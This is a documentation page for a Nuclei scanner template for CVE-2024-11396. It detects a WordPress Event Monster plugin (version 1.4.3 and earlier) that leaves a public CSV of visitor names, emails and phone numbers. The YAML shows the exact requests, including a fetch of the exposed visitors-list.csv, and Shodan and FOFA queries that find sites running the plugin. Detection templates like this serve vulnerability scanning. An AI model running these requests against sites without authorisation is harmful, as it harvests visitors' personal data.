Skip to content
Nuclei Templates

Event Monster <= 1.4.3 - Information Exposure Via Visitors List Export

ID: CVE-2024-11396

Severity: medium

Author: s4e-io

Tags: cve,cve2024,wordpress,wp,wp-plugin,event-monster,info-leak

Description

Section titled “Description”

The Event Monster Event Management, Tickets Booking, Upcoming Event plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.4.3 via the Visitors List Export file. During the export, a CSV file is created in the wp-content folder with a hardcoded filename that is publicly accessible. This makes it possible for unauthenticated attackers to extract data about event visitors, that includes first and last names, email, and phone number.

YAML Source

Section titled “YAML Source”
id: CVE-2024-11396


info:
  name: Event Monster <= 1.4.3 - Information Exposure Via Visitors List Export
  author: s4e-io
  severity: medium
  description: |
    The Event Monster Event Management, Tickets Booking, Upcoming Event plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.4.3 via the Visitors List Export file. During the export, a CSV file is created in the wp-content folder with a hardcoded filename that is publicly accessible. This makes it possible for unauthenticated attackers to extract data about event visitors, that includes first and last names, email, and phone number.
  reference:
    - https://github.com/RandomRobbieBF/CVE-2024-11396
    - https://plugins.trac.wordpress.org/browser/event-monster/tags/1.4.3/em-ajax-prossesing/em-visitor-ajax.php#L92
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/0f522dfe-f2c2-4adb-980c-1f03d3c26e12?source=cve
    - https://nvd.nist.gov/vuln/detail/CVE-2024-11396
    - https://github.com/advisories/GHSA-6x4w-fvqp-6jvc
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2024-11396
    cwe-id: CWE-359
    epss-score: 0.00046
    epss-percentile: 0.19303
  metadata:
    verified: true
    max-request: 2
    vendor: a-wp-life
    product: event-monster
    framework: wordpress
    shodan-query: http.html:"wp-content/plugins/event-monster"
    fofa-query: body="wp-content/plugins/event-monster"
  tags: cve,cve2024,wordpress,wp,wp-plugin,event-monster,info-leak


flow: http(1) && http(2)


http:
  - raw:
      - |
        GET /wp-content/plugins/event-monster/readme.txt HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - 'compare_versions(version, "<= 1.4.3")'
          - 'contains(body, "event-monster")'
          - 'status_code == 200'
        condition: and
        internal: true


    extractors:
      - type: regex
        name: version
        part: body
        group: 1
        internal: true
        regex:
          - "(?mi)Stable tag: ([0-9.]+)"


  - raw:
      - |
        GET /wp-content/uploads/visitors-list.csv HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "First Name, Last Name, Email, Phone, Event")'
          - 'contains(content_type, "text/csv")'
          - 'status_code == 200'
        condition: and
# digest: 490a004630440220103d2ae4965c41496c11da75c3c1a3adf5c457a99371ed616bc90c6f642c761f02205037c1b015321ac5cf4a297240cf3cc237b3b2ea0c783f3925275becd4a37996:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-11396.yaml"

View on Github